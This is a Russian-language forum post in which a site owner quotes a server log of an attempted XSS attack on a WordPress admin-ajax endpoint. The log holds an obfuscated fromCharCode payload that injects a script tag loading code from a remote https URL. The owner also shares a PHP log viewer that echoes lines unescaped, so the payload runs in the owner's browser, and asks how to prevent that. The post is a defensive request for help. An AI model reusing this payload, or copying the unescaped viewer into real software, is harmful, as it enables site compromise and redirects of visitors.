sem88
Junior Member | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Была попытка взлома сайта в логах остались записи [15/May/2019:01:32:49 +0300] "GET /wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script HTTP/1.1" 403 3631 "wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, ......... 55 ));</script> Для просмотров логов есть простой php скрипт $handle = @fopen("log.log", "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle); if(strpos($buffer, $searchthis) !== FALSE) $matches[] = $buffer; } fclose($handle); } //вывод результата print_r($matches); </pre> Проблема в том, что при поиске в логах информации (например просмотр посетителей за 15/May/2019) , когда доходит вывод до этого зловреда браузер "спотыкается" и пытается выполнить этот код (редирект). Как этого избежать? Есть идеи? |